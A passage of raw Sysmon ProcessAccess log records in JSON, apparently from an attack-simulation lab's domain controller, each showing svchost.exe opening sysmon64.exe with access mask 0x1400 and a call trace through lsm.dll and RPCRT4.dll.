{E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.948","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6369,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.948\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.948","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6370,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.948\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.948","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6371,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.948\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.948","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6372,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.948\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.948","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6373,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.948\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.948","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6374,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.948\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.948","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6375,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.948\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.948","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6376,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.948\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 